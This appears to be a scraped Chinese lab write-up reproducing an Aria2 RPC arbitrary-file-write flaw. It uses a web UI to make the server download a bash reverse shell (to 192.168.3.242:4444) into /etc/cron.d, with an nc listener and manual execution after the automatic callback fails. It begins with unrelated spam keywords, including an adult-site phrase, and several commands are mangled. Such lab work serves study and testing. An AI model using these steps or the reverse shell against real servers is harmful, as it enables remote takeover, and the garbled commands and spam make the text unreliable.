白人与黑人做爰网站,网站开发项目描述范文,php外贸网站制作,棋牌搭建工具目录 Aria2介绍漏洞描述漏洞复现 Aria2介绍
Aria2是一个在命令行下运行#xff0c;多协议#xff0c;多来源下载工具#xff08;HTTP / HTTPS#xff0c;FTP#xff0c;BitTorrent#xff0c;Metalink#xff09;#xff0c;内建XML-RPC用户界面。Aria提供RPC服务器多协议多来源下载工具HTTP / HTTPSFTPBitTorrentMetalink内建XML-RPC用户界面。Aria提供RPC服务器通过–enable-rpc参数启动。Aria2的RPC服务器可以方便的添加、删除下载项目
我们可以使用 RPC 接口来操作 aria2 并将文件下载到任意目录从而造成任意文件写入漏洞。
6800 是 Aria2 的 RPC 服务的默认端口。环境启动后访问 和 服务会返回 404 页面
漏洞描述
RCE漏洞可以让攻击通过控制文件下载链接文件储存路径以及文件名直接向后台服务器远程注入操作系统命令或者代码从而控制后台系统。同时通过Aria2提供的其他功能诸如save-session等也能轻易地实现任意文件写入指定功能
漏洞复现
1.测试环境访问http://192.168.3.243:6800/ 是一片空白 2、使用burp抓包发包。发现报404错误 3、首先因为rpc通信需要使用json或者xml不太方便所以我们可以借助第三方UI来和目标通信如 http://binux.github.io/yaaw/demo/访问这个UI点击这个小扳手settings添加你的靶场域名 4、配置Setting按照下面的内容结合自身的ip地址填写 其它的包括Base Dir不用填写保存后自动显现。 5.配置一个web服务器kali已经集成了Apache只要将其启动就可以开始使用了
启动命令service apache2 start
停止命令 service apache2 stopShell文件内容
#!/bin/bash/bin/bash -i /dev/tcp/192.168.3.242/4444 01将shell文件放在/var/www/html/目录下
6、上传shell文件 首先在kali中开启监听
nc -nvv -lp 44447、点击添加新增并且设置下载任务填写shell的url及受害主机shell文件的存储路径 和我查到的所有资料一样 都不能自动获得监听
8、手动获取监听
在靶机中输入
docker ps
//查看容器id
docker exec -it 容器Id /bin/bash
//进入容器shell 例如docker exec -it c9ff092ad911 /bin/bash
cd /etc/cron.d
//进入到cron.d目录
ls 从上面已经上传的shell可以看出这个任意文件写入漏洞是存在的
9、手动给shell加权限执行shell
chmod 777 shell
./shell